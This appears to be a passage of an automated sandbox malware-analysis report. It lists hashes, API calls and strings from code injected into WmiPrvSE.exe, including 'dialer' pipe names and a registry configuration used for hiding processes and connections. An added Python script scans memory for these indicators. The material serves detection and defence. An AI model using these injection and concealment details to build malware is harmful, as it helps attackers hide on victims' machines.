                                                        • Instruction ID: 2fb693fa3f977521cf3d4682d4f7e72b55d37f83b51f72f2975c0f80fa638129
                                                        • Opcode Fuzzy Hash: 7e885fb1de6b33c8836a5cf327a6586278a6dc8325f5f06cc0bad73f1b52aaf2
                                                        • Instruction Fuzzy Hash: 2541ACA244E7C18FD7038B749C766913FB0AE23255B1F89DBC4C0CF1A3E1195A5AE762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14050e578a367922eba2cb4a074c2f48ad8fd21e306ac395bf78f67e3987926d
                                                        • Instruction ID: dd10d7fc88bfb0f3bd90b977b8428cfc8485502a75ac4a6dd3abf0064f00d5dc
                                                        • Opcode Fuzzy Hash: 14050e578a367922eba2cb4a074c2f48ad8fd21e306ac395bf78f67e3987926d
                                                        • Instruction Fuzzy Hash: 5C31E870E18A5D8FCF88EF98D451AEDBBF1FB69300F20516AD419E7291CB35AA41CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: c9$!k9$"s9$#{9
                                                        • API String ID: 0-1692736845
                                                        • Opcode ID: 2af611734ed15c9b9afcbd2e114b3668db27928fea059129e65cd52b36b734c3
                                                        • Instruction ID: a48a9aa598d4cf26993ff4af75965005228ce64cb117de4c073b3d04e59b5b01
                                                        • Opcode Fuzzy Hash: 2af611734ed15c9b9afcbd2e114b3668db27928fea059129e65cd52b36b734c3
                                                        • Instruction Fuzzy Hash: B1519E17B0D06659E239B2FD78618ED5B488FA827FB0847B7F46D8D0D78D086085C2E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 06e87f6da14ffa3972b917f376902c18445c70b0b36387eb4cf7f7bd653b36b6
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 02118032B107E083FF70EB22F95D7EF22A4BBB4B45F50516D9A4681595EF78C0A88250
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000216D26F1628: GetProcessHeap.KERNEL32 ref: 00000216D26F1633
                                                          • Part of subcall function 00000216D26F1628: HeapAlloc.KERNEL32 ref: 00000216D26F1642
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F16B2
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F16DF
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F16F9
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1719
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F1734
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1754
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F176F
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F178F
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F17AA
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F17CA
                                                        • Sleep.KERNEL32 ref: 00000216D26F1AD7
                                                        • SleepEx.KERNEL32 ref: 00000216D26F1ADD
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F17E5
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1805
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F1820
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1840
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F185B
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F187B
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F1896
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F18A0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 3b3ec43b34bc7c74e54b928c79361c24c7783f5ea0374df26fa6b5afc27bf782
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: A931B8713117A183FF509B2AFA6D2EF23B5ABF4BC0F4454699E0987699FE24C891C210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph (rendered figure in the original report; legend: Executed / Not Executed). Recoverable blocks: 216d26f3844-216d26f384f, which branches to 216d26f3851-216d26f3864 (calls StrCmpNIW) or 216d26f3869-216d26f3870; 216d26f3851-216d26f3864 falls through to 216d26f3866 or 216d26f3869-216d26f3870; 216d26f3866 continues to 216d26f3869-216d26f3870.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 6d50af5e443f0b5a1b10834cd7f43757556e4f3daefa92c80cf3a1e09134f5da
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: E7D0A7703213C6CBFF24DFA7E8CD6F96360EB28B44F884028D91001150DB5D8D9D9710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367207217.00000216D26C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216D26C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26c0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 4d6850e5edaad7af1019651b05116c1117eacf110da8bbe6186f6baef486b0f9
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 5461E272B017E087DF68AF16A0487AD7B92F764FA4F5C8129DE5907788DA38D852E700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Control-flow graph (rendered figure in the original report; legend: Executed / Not Executed). Recoverable information: the function's entry block is 216d26f2b2c-216d26f2ba5, its common exit block is 216d26f2ee0-216d26f2f03, and its blocks call GetModuleHandleA, StrCmpNIW and lstrlenW plus the subroutines 216d2712ce0, 216d2706090, 216d26f199c, 216d26f1bbc, 216d26f152c, 216d26f3844 and 216d26f85c0. The full node and edge listing of the graph is not reproduced here.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 08a8d0198ac4937a3c62658ab8e4bd3f61832f40d1c6f621bdb0b40b061259f3
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 5EB17F72311BA087EFA58F25E85C7EE63A5FB64B84F54501AEE0957798EB35CC40CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: c03fe58164123225f9af638b85600b70d16c18d65751f0822510b86061e0e248
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: ED313C72305B808AEB609F61F8987EE7374F798744F44442ADA4E57B98EF38C648C710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 84dda6b063edcf1b436ff4901af77c301f9731e3b1a9d8c16d87d96385fdbb1d
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 79317C32314B8086EB60CF25F8983EE73A0F799754F51012AEA9D43B98EF39C159CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 47cd65222b6dfd8ee39d338ffd709708c537ad1a16816e85f25416f146059c2a
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 0D710B36310B5086EB20AF66F99DAED23B4F7A4B88F015119DE4E97B69DF39C448C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 96c997046e1355441d4318b30f8826780c6a3a7a860843d4009e498c9daeb0be
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: DF513776700B8486EB64CF62F55D3AEB7B1F799BD9F058128DA4A07718DF39C4498B00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000216D26FCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCEBC
                                                        • SetLastError.KERNEL32 ref: 00000216D26FCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000216D26FECCC,?,?,?,?,00000216D26FBF9F,?,?,?,?,?,00000216D26F7AB0), ref: 00000216D26FCF2C
                                                          • Part of subcall function 00000216D26FD6CC: HeapAlloc.KERNEL32 ref: 00000216D26FD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF54
                                                          • Part of subcall function 00000216D26FD744: HeapFree.KERNEL32 ref: 00000216D26FD75A
                                                          • Part of subcall function 00000216D26FD744: GetLastError.KERNEL32 ref: 00000216D26FD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF76
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: d11699a7f6e17cf0efe9ece0774751f9ea38668c029b1f9cb3cde6bd6a240e56
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 6541A2307013E443FE79E735B56D3FF62926FB57B0F25172CA9364A6EAEE2894418210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 490bfccdf753e2bc7508e4e01608ad746833ba0924d2233be78864ab671b7703
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 39216A32714B5083EB208B25F55C7AE63B1F7A9BA4F504219EA5902AA8DF7DC189CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

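The two named-pipe strings listed for this function (`\\.\pipe\dialerchildproc32` and `\\.\pipe\dialerchildproc64`) are the most directly searchable indicator in this code region, which was dumped from the WmiPrvSE.exe process (snapshot file above). The following check is an added example, not code from the Joe Sandbox report or from the sample: it scans a memory dump or PE image for either pipe name in ASCII and UTF-16LE form, and on Windows compares the leaf names against the live pipe namespace. The `SAMPLE_DUMP` bytes are constructed for the demonstration; only the pipe names come from the report.

```python
import os
import re
import sys

# Pipe names taken verbatim from the "String ID" entry of this report's
# WmiPrvSE.exe function listing.
PIPE_INDICATORS = (
    r"\\.\pipe\dialerchildproc32",
    r"\\.\pipe\dialerchildproc64",
)


def _patterns():
    """Build one regex per indicator and encoding. A native x64 payload
    normally stores wide strings, but a dump may contain either form."""
    out = []
    for name in PIPE_INDICATORS:
        out.append((name, "ascii", re.compile(re.escape(name.encode("ascii")))))
        out.append((name, "utf-16le", re.compile(re.escape(name.encode("utf-16-le")))))
    return out


def find_pipe_indicators(data):
    """Scan raw bytes (memory dump, PE image) for the pipe names.
    Returns a list of (offset, encoding, name) tuples sorted by offset."""
    hits = []
    for name, enc, pat in _patterns():
        for m in pat.finditer(data):
            hits.append((m.start(), enc, name))
    return sorted(hits)


def match_live_pipes(pipe_names):
    """Given pipe leaf names (as returned by os.listdir on the pipe
    namespace), return the full indicator strings that are present.
    The comparison is case-insensitive because the named-pipe namespace is."""
    wanted = {n.rsplit("\\", 1)[-1].lower(): n for n in PIPE_INDICATORS}
    return [wanted[p.lower()] for p in pipe_names if p.lower() in wanted]


# Constructed dump fragment (not sample data): the 64-bit name as UTF-16LE
# at offset 16, filler, then the 32-bit name as a NUL-terminated ASCII string.
SAMPLE_DUMP = (
    b"\x00" * 16
    + PIPE_INDICATORS[1].encode("utf-16-le")
    + b"\x00\x00"
    + b"\x90" * 8
    + PIPE_INDICATORS[0].encode("ascii") + b"\x00"
)


if __name__ == "__main__":
    # Usage: python pipe_ioc.py [dump_or_pe_file]; no argument scans SAMPLE_DUMP.
    target = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(target, "rb").read() if target else SAMPLE_DUMP
    for off, enc, name in find_pipe_indicators(data):
        print(f"0x{off:08x} {enc:9s} {name}")
    if os.name == "nt":
        # Only Windows exposes the pipe namespace as a listable directory.
        for hit in match_live_pipes(os.listdir("\\\\.\\pipe\\")):
            print("live pipe present:", hit)
```

The byte scan is deliberately encoding-aware: a wide-string indicator will not match an ASCII search and vice versa, which is a common reason string-based IOC sweeps over process memory miss hits. The live-pipe check is only meaningful while the injected WmiPrvSE.exe child is running, so run the dump scan against a full process memory capture when triaging after the fact.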
                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 92ddf48e1aa4a1190580f65684b299f7d0a26a8f15121ea85989b59e145c7e08
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 7E419332311BA092EF26CF26B91C7EE3395BB65BA0F05512D9D09977C9EF38C4498354
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Nodes (basic block address range, API calls in block)
                                                        • 739: 216d26f104c-216d26f10b9 RegQueryInfoKeyW
                                                        • 740: 216d26f11b5-216d26f11d0
                                                        • 741: 216d26f10bf-216d26f10c9
                                                        • 742: 216d26f10cf-216d26f111f RegEnumValueW
                                                        • 743: 216d26f11a5-216d26f11af
                                                        • 744: 216d26f1125-216d26f112a
                                                        • 745: 216d26f112c-216d26f1135
                                                        • 746: 216d26f1147-216d26f114c
                                                        • 747: 216d26f1137
                                                        • 748: 216d26f113b-216d26f113f
                                                        • 749: 216d26f114e-216d26f1193 GetProcessHeap, call 216d2706168, GetProcessHeap, HeapFree
                                                        • 750: 216d26f1199-216d26f11a3
                                                        • 751: 216d26f1141-216d26f1145
                                                        Edges
                                                        • 739 -> 740, 741
                                                        • 741 -> 740, 742
                                                        • 742 -> 743, 744
                                                        • 743 -> 740, 742
                                                        • 744 -> 743, 745
                                                        • 745 -> 746, 747
                                                        • 746 -> 749, 750
                                                        • 747 -> 748
                                                        • 748 -> 743, 751
                                                        • 749 -> 750
                                                        • 750 -> 743
                                                        • 751 -> 746, 748
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 36a5de4b35330dd6bf783404e2c0f3cce9a4c255769af094cc3b1710d72c7746
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: CE416D73614B84C6EB60CF22E45879E77B1F399B98F448129DA8907B58DF39C489CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: bbdc88ed379a5248da2f3bc616235ad33d39205bdc7da67ecc880a6fe3d3c7e5
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 5E1151307043E443FE69A735B55D3FF61515BB47F0F24532C98390A6DADE69E4428200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: d91f1ddd1e23f78949fbc93a21aec31379e2e5c1a4099b5947a4f9999bde744f
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 0C31A53131B7A0D2EE25DB42B90C7EE22A4BB68BA4F59052D9D1D0B798EF39C4498350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 7ab6818446840e18fec15ba70f91da5db94e77b29423fbb15da8559ae62a4ca0
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: F711BF31310B8086E7708B13F96C7AD72B0F7A8FE4F050229EA6A87794CF39C8488740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: d4fca3ae67716ce6b46a4d8b2ad9e809881d3a676f3b5f353888f58d38bd36b4
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: E3115736700B9083EF249B22F51D6AE62B4FB98B84F050028DE9903794EF2EC509C704
                                                        Uniqueness

